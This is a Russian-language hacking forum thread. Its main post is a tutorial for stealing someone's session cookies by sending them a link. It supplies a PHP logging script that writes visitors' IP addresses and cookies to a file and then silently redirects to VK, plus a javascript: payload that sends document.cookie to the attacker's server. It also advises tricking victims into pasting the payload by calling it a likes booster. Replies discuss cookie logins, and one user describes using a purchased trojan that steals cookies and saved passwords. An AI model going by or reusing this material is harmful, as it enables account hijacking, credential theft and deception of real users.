Получаем куки

bastiang19

Местный
Статус
offline
Регистрация
17.05.2017
Сообщения
118
Репутация
66
Данная схема не придумана лично мной, но формулировка моя.-.
На форуме не нашел ничего подобного, поэтому почему бы и нет

Сегодня я расскажу как можно получить куки человека удалённо, всего лишь отправив ссылку.

Итак, поехали.
1.Первое, что нам нужно - это хостинг/сервер. Если вы не планируете заниматься этим на постоянной основе, то вполне подойдет и обычный фри хостинг.

2.Заходим в файловый менеджер, и создаём папку.(в моём примере я назову её "kek")

3. Меняем права папки на 777, то есть ставим везде галочки

4. Создаем в папке документ index.php

И вставляем в него этот код:

<?php

//получаем данные с ссылки

$cookie = $_SERVER['REQUEST_URI'];

//ip адрес

$ip = $_SERVER['REMOTE_ADDR'];

//Создаём файл

$file = fopen("snif.dat","a+");

//вычисляем текущее время

$time = date("H:i:M:d");

//добавляем в строковую переменную куки + время + ip

$add_text = "$ip $time $cookie";

//записываем данные в файл

fputs($file,$add_text.",\r\n");

//закрываем файл

fclose($file);

//что бы не спалили переносим пользователя обратно в вк

header('Location:https://vk.com');

?>


5. Вы можете поменять редирект(последняя строчка). Но это уже зависит от того, где вы будете распростронять скрипт)
То есть вот ссылка :
ваш_домен.ru/kek/index.php

6. Записываем себе в блокнот данный скрипт:
java script:window.location.href = "http://ваш_домен.ru/kek/index.php?cookie="+document.cookie;

(!!!ВАЖНО!!! Когда вставите скрипт в адресную строку, то уберите пробел между java и script.)

Теперь большая часть сделана. Осталось втереть жертве, чтоб она вставила скрипт в адресную строку. Например скажите, что это скрипт на накрутку друзей, лайков, хромосом и тд.
Тут уже сами думайте)

Когда жертва вставит скрипт, она будет перенаправлена на главную страницу вк, и даже ничего не заподозрит. А тем временем в вашей папке kek появится документ "snif.dat" в котором собственно и будут находиться куки. Останется только вставить их себе в браузер.

К слову, в ВК авторизоваться при помощи только куки уже давно нельзя.-.
 

flofloflo

Новичок
Статус
offline
Регистрация
15.05.2016
Сообщения
20
Репутация
2
если быть с жертвой в одной вайфай сети то по идее можно по кукам зайти. Ну точно должно работать если с одной файфай сети и жертва ранее заходила с вашего устройства к себе в вк.
 

XeuTep_BY

Участник
Статус
offline
Регистрация
27.11.2017
Сообщения
95
Репутация
28
К слову, в ВК авторизоваться при помощи только куки уже давно нельзя.-.
Я в этом не силен. Но купленый троян присылает мне куки жертвы. Эти куки вставляю в расширение (скачаное из магазина) для гугл хрома. И все у меня работает авторизовывает и в вк и в баду и других защищенных сайтов
 

XeuTep_BY

Участник
Статус
offline
Регистрация
27.11.2017
Сообщения
95
Репутация
28
Это не куки, это токен.
Это разные вещи. Чисто по кукам ты не зайдешь, есть такая штука как фингерпринт.
Конкретно куки. В формате jso + файл с логинами и паролями от сайтов Screenshot_20171129-191312.png